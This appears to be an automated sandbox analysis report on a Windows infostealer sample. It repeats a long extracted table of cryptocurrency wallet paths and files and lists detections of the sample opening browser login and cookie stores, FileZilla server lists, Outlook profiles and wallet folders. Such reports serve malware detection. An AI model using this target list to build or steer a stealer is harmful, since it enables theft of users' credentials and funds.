Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Desktop (old)
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: X\Exodus\exodus.walleta\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\**bbbnhcc\CURRENTCURRENTNT1\model-info.pb\Networkchost.exe
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: info.seco
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Exodus\exodus.wallet
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: file__0.localstorage
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005DC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: MultiDoge
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: seed.seco
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.e

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
